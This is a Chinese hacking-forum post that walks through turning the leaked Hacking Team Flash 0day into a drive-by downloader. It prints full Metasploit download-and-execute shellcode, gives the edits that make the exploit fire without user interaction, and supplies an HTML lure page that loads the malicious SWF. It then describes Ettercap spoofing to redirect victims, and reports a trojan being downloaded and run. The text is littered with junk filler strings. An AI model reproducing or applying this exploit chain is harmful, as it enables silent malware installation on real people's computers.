找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1020|回复: 0

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
发表于 2018-10-20 20:28:55 | 显示全部楼层 |阅读模式

) \; t# J: i/ ?8 D 三、flash 0day之手工代码修改制作下载者实例入侵演示 0 q7 a2 L1 u7 J- z9 t

. P. r9 X* s# \9 m: f5 s

8 t" B- I! r9 B" L 利用到的工具: % B4 O) S0 ^; h. G7 p( d6 J/ `

9 C2 F2 c4 X7 f2 E( J

* \" T! T0 c& w/ J' U# w4 z Msf ) F0 M) m _8 c$ U# l1 }- g

, R( W4 ]) w8 X- M1 k! H4 q

) n) D& D2 G2 t Ettercap 1 n) x: M9 o, V* X

! ?, K$ g% Y/ v& b; w3 ^

; @/ {9 j% K0 h3 {# y! h4 h4 h Adobe Flash CS6 6 ?9 s# K6 R S# Z; W+ }

* S! Y+ i9 C& v1 b5 ~1 B: U

$ `8 U# s8 x8 M; l5 Y Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 ! C3 n6 B# N4 A S& ~

+ V; }: c/ K* U5 ] e

9 B' F5 g" @! ?5 T( y 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options 7 C, q. d! Y+ K% a: q% D

. I5 B# p/ V8 G7 b

- n. z" I. G- h! V5 e' \1 C 如图: " j! Q0 E1 u- x! n% I- }* ~

; P) {9 D9 r( b9 j+ n3 J+ m

' a2 [) Z* O4 ?/ b4 [" E   / K7 p/ \6 M4 P4 |4 ]

3 V4 S/ E; S) n& |% R# ?

" L+ N7 v: o" ?) h' J) B. g   , Z, W% `$ g* V( h6 }3 C: A" h

8 E. K4 ~; I. i" y; T i p5 {' ]

7 N6 V! c4 q6 i+ `0 C$ W 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 4 ]# M; v* d! A# N1 H- i

7 }9 [9 O: s9 X/ ]7 _

+ |2 m. r, O# q1 z& X   8 u1 j2 S: q- E3 `: d( p

0 p# y1 _0 |6 K

; {6 {9 r+ U, x1 D0 _! t# y   9 H) \) @0 M! G z9 G2 l, s

5 M% y! Q5 j" G

6 Y& F1 g0 H9 [- v7 T 然后执行generate -t dword生成shellcode,如下: * `( \: B8 z. p; J9 `

( J2 p7 v. L3 g% H$ }2 F

# ?0 T# F" ^# p9 J4 m   ' R4 ]! n! }) z3 ?" Q$ B

- M6 [3 E; G! ]

7 |3 w# ~5 a1 e- e+ v' g 复制代码到文本下便于我们一会编辑flash exp,如下: % }0 ?$ t* w! `: R5 f7 X

1 m- }2 _4 e5 p( X* d. e

. j8 j! e) M1 \! g: R! x 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, " S8 j$ U. ]% z( V* |/ U

9 j7 D6 @8 @ P

$ _0 K3 Y/ U0 X+ m4 H 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, # n; t* L; F# a9 [7 _# B; q* M

- I% C3 ^1 d( {2 O g& F$ D

5 Q8 y+ T7 L6 j5 O) Y' } 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ' ~' I& ^, i b9 `! U! v& P; D5 c

* D, V+ Q1 i$ F

/ q6 A+ ^: s- V4 `. {0 W 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 0 K' L8 l3 T/ ^% e" N/ T! R

8 L! V; y+ m# Q& q1 X

f7 R" ^: Z: y9 f: z5 G Q: x 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, ' H f% ~4 r3 b2 D& G/ [# E

+ B: o$ `( e8 I: W6 X$ S v

1 v* @, O7 x* @# `0 Q 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 ]7 p! h, x) q) I# E0 N8 U( N" @$ f

5 ~0 @. x; W2 g- m7 K2 A U4 {

+ t/ F6 U: C: b( i$ w. } 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, ' j' K7 W5 Z+ |: m9 j6 w

+ A2 Y5 D7 b4 O$ M! p) T1 B

8 \# G( K0 D& y' t* c8 ^' ?8 Q1 _ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, # W! i7 A2 }" M# s1 m

4 _: \: ~+ }) r C

7 S a8 @8 K9 J3 `2 D, } 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, $ `' x; z7 O# U$ h

0 @1 c2 w# n) u

% x$ j5 R; { }0 _9 _5 J5 k2 _! n 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, . c. }( Q" Z) M, m/ B: ?) r

9 h; p$ m1 n) {0 B- i9 B F) e2 i% K; ]: H7 k

; o- _! z1 Y7 P! J6 `- G 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, : g0 [) j# i: p7 X8 p2 w

# V8 w) A" k6 l- F' F

5 \# A: e3 ] e2 S' z6 D* C! E 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 1 ~, c' u$ E, k+ k! @: k$ ~* L. v

% m: H$ E# f8 U6 f& \% t! w

; t: f w+ J) e& _7 f 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, / ~+ @( |' e; U: K+ N7 V: I+ ]

6 u. z, c: i P# a4 I2 O

* a9 y: W/ n8 ^- W! c( R 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 # l0 y! m2 z3 q8 E% m: _0 U4 N+ K/ |% l

& e1 ^' z6 P/ g+ L' x% c x

7 t' V1 G; y$ W& C& n   $ G6 W+ i5 g; C3 N- m( ^7 o- e' q

8 q) y' L% ~ b9 V/ }. m! Q

9 i/ K) ] M- l+ e6 f( p   / V( D3 u9 \( ?, H& u8 M+ e: a# [

' X8 f$ U. v$ ]

. p& C" P% g5 u# X7 _; w' }, E 下面我们来修改flash 0day exp,需要修改三个文件,分别为: - ~. v+ k0 l3 u) y4 V2 |

# A$ K$ s- |, p! d ~2 _

% q. N. d' h% }   }$ I( X, y8 i1 F

3 @) t4 M7 T2 H/ X6 r

4 E. |) r; W2 Z( a* d1 w 先修改ShellWin32.as,部分源代码如图: ! o2 w" k0 H0 Z# y" y% G5 x

8 w* [" g" q' |/ V

. |1 A; E- c/ t3 b$ G* I   ! A, w9 B. e$ C. i

6 @3 B8 ^7 R0 u: Z! d7 ]

) x* ~0 R. X5 C/ O4 R0 A 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 4 Z+ n& s7 \- C. d/ ~6 K

" M9 W- \4 f$ Y1 e8 }5 H

4 H6 A t% {- }$ Q8 i   " G% r+ v; a3 \0 n6 Y( h

4 Y( j9 [% O, ?6 n" ?- {

; j$ S. x* D( y6 j3 a9 L: U) h1 D* ^ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ; M& Y" R% ^4 {" V) h

* D3 ]3 T" f& s) [# E

: O0 k" |. }" v2 ]7 c   M) c/ ]$ t3 G0 v$ u5 F

6 C" ~6 p2 R3 {8 a

5 s8 |9 @ z0 W# d, m: `$ j9 A( P, j 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: T) \0 T, I" k" h

* |5 K4 M! C- u, l1 X

, Q; Z& e6 V& O% B8 B, b7 H; d8 ]   8 N5 p( h* W. I, L0 d! m5 d

E2 C/ R7 H" m; ~5 b

7 H, \( l, i2 x. W7 u$ ?: Y   6 Z5 Y3 n X9 J/ v2 C/ }# f

8 N; K$ P" \: l1 }0 x: i3 W

' F0 L$ G7 G3 e   ( J3 h2 L, e7 V

5 }( `: ]6 D8 i7 l0 \8 r$ @2 G; B

0 `. b/ t+ y) ~! S4 e5 x 然后点保存,下面我们来编译一下,打开 ; g4 n& d! S: w2 ~

6 z' u7 f$ i" A

. J4 Z$ J( ~3 I+ w b, g8 K exp1.fla然后点文件-发布,看看编译没错误 5 f+ C# t+ z8 d

( {. t; ^+ M6 W' s6 ]

0 Y# V3 C% X& t3 j& Z   7 I. N: z5 g5 y( g

" z8 m8 c# s$ V

* i9 z H, N$ `. ~   # P* j8 p+ o B( x( w. E

& e$ D4 B! ~: s( D: `8 W5 F

$ i b, }! s. O b   ) i8 @, o/ b" `/ A8 ?. ?( i

& ], r/ f6 N9 \% ]% W) E( P

# ~0 a& B8 O/ ]3 E2 R* O3 U6 p   ) k4 {( A' H8 `( r( @" t

7 T2 I! G$ u6 l; {3 Z

( j6 z8 g% Z) N7 _9 K. R. _5 e 然后我们把生成的 * Z. y9 Q* _; }

4 s* E1 S) V% h. q3 f0 U

# ^+ Y1 ~' K- l8 [ exp1.swf丢到kailinux /var/www/html下: + `4 i$ l7 k- T, ?' M

0 K' Q( c( d2 |, d/ V. T& x. O

9 s3 \# D) f5 s; k6 t4 ~8 x ? 然后把这段代码好好编辑一下 0 ^: O' t+ R' v

4 C9 a* k: [8 s9 ]5 t2 O" w

# M2 i( k( i3 q9 l# ]4 e   5 f+ b5 h$ G d; x4 t- O5 ~( q

- }( D% {- l$ i; h

! t' q. _3 w+ x   + Q& _2 c* f/ J

% ?9 Y7 C4 l: ^. R5 W( g

3 o0 |4 W! C5 D1 |# f/ J   - a1 N, t! Y, ^) S7 W6 N2 J

- f0 A* [0 I/ a, ?

3 R1 b( H7 K, ]6 G3 R9 o   3 o; [$ i" d4 w1 d0 x0 ]' z a

; \6 L$ x( d$ G7 P

6 j7 o4 [& |4 w, I   9 ~* W8 g' B1 Q+ k i+ G* q

. s2 y- L( A n* \

' U/ E# K$ i/ B3 E   . `- g; m! b+ h4 r; B+ _! p0 F1 ~3 J

7 u/ b2 n: \, [5 b6 e9 ]: g

% u a0 O+ Z0 p! v5 f <!DOCTYPE html> 1 Y! `7 p3 Y( w& T9 r1 C

5 h+ O* @6 R0 E

; g/ B" [2 r4 v+ `, w7 |* C <html> + f2 G$ P) Y B9 R# Z9 Y0 ]* p

. ?. h7 w9 b. ~# G

" x1 B, D- g* ^ m* b <head> $ n% \* O) `0 |5 B* T2 P

) M2 b" i+ \5 C8 F1 B

4 m' ?( l: H9 G1 F6 \2 a$ C: w9 n <meta http-equiv="Content-Type" content="text/html; / i1 W1 l6 I; {/ x( }! |2 B

) C$ J9 @+ @( |& d. r

$ @& |- y1 F+ A' c4 n1 M charset=utf-8"/> 4 q3 G! k+ l: o9 j2 ?+ H% N

8 T% ]0 R0 \* A: X

h7 T. _( T5 D- v7 |7 J </head> , b' Y! y [: e

8 b/ i$ H* y! [, ~

7 d3 q$ ]# l5 _1 f! V7 Z. g; | <body> W7 _5 ?1 E) ?# `9 K

3 r8 p4 |! x9 \! r' Y

, Z6 C; l" _- ] <h2> Please wait, the requested page is loading...</h2> " U1 L# _# ?: O' V; z- k$ x

( M* r9 S- q( a( j# s/ V: }6 w

1 M. [ m3 X! D) t <br> 3 v5 Z. V9 z! o" e W+ x; v

$ w. d( J7 }1 c9 s# Y# _! Z

9 W n& @# e3 c( ] z+ \# s1 F <OBJECT 0 s! Y0 M6 w, y- _* r

/ e3 X) |) C" _

' Y i, y4 {% S9 [$ l classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ( Z0 Q& [7 O8 F0 f

+ G5 `% V6 d9 V/ u1 Z7 z

0 N2 _2 o; O3 y+ g VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 7 q- F- Z4 \7 b. a/ T3 a# Q$ K

$ N3 V5 X3 }7 l# ^- t) k {- _3 |

f; r" P6 o+ T# M @4 B </body> * v1 P$ W* a( U( n- Z- K- Y5 c

( x( y& r7 r8 K; v# t8 y

1 I5 T9 S9 B+ Y" |: s6 Y* w# A <script> 1 w/ V# w' s0 W! `" a# t5 t6 D

; i7 V8 K) F4 V1 b4 c) n

: q8 P( l: N b* \     setTimeout(function () { 8 z S5 r3 W4 a( ^+ d# r6 D0 @

# b9 d' z7 q& y+ d

2 f) f* y: d/ [ X          " ]; i5 I1 h9 b5 K

7 k0 S. A1 u6 _5 r* Y9 ]" o

3 \4 G# ~5 E( u window.location.reload(); / T* }* i+ g3 E$ W

7 `" A5 _" C+ R2 \$ S! ]

( Z9 H3 ?' f) Q. h     }, 10000); : y3 _+ U6 O- ^

8 b6 ^" D& b) |# z

3 c/ U1 {9 o% d2 T; a   % V6 f, @' j3 _' n$ n8 Z; i7 {

3 @ T( R: g3 g

' M: m+ N2 N9 r) g& G+ `& d4 K </script> + A% M" Y e& F: |6 \! \3 k

" I, [* P) Y% e8 ]

, z6 s- x2 y1 a/ G b) e </html> $ e+ f0 d+ o) ^6 F: U

! S$ G7 l2 L! Q, z3 c6 h: E6 O" l. p

4 I \( r* t# p! i: J: J   2 A @+ O5 W3 ^6 u) o

. w* x D8 |8 Q \

% u/ b+ X/ X! \* }4 c# _6 N! q: W 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ) [/ ^; F" J. [' N

r$ \3 M9 p9 l6 e( M5 D4 k

" R. D9 J# G) `9 i3 u$ W* K& N$ [3 \- Y   7 `1 F. n( D4 {/ ^" w8 X8 V

: x; p' n# x5 l2 ~

8 A- |# @6 u4 B# a/ l+ U   6 V9 ]/ b: n. B: |1 F

7 R- ^ e" o6 i2 ^% m

+ h, E3 F: w/ K8 h K8 H   5 D: T6 {3 a. e, [/ L

0 _1 e5 Y* Y1 u. B1 E+ l

& m* a4 R' r, j3 d7 h# ^5 F   ! ^+ O5 t9 E( Z& m1 I

( t( ~: y5 V3 R8 q( ]% e

6 M' L7 w. p8 t# ?   & \, {( j7 _% t2 K: n. f5 p

0 o/ C4 A/ H- h

8 Z$ a: @( |8 D+ p 下面我们用ettercap欺骗如图: $ x3 u* t1 z3 l

- m4 L3 B! z0 L7 H

# F6 J, X' R2 `% h) b' _1 q   / U+ F- }6 a: s

: m P9 K" X3 i/ Y D; b

% ^' n0 }9 w6 ]( d   - d+ K+ X, G% }/ w5 t5 k1 a: L( y- _

6 u- |/ n& k3 Q3 K- b# h

; R. d+ ~" j8 ^- ^ 下面我们随便访问个网站看看: 2 m+ [5 s, R# T" x/ ~+ _6 E; ]

) r( g, S% l H3 ^6 p

4 E2 x/ `$ n5 E" X* a2 O7 o/ v7 R! ~ 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: ) C& y. {9 y( ^( E

! q3 q1 X4 q% ^6 f. u; G

8 g% j5 y7 U0 @) E- W E   $ c) C! f1 H! C5 n' A* k

7 v5 \- g- m! c, b. A J Q

! t. e) A( I J: |- i 我们看另一台, % d# z* E0 G0 C

: @7 X8 C2 a$ U$ L8 W. B

4 l; p1 P" N M/ z! U 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 ! [( B/ H; s3 T- x3 D' ^% Q

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表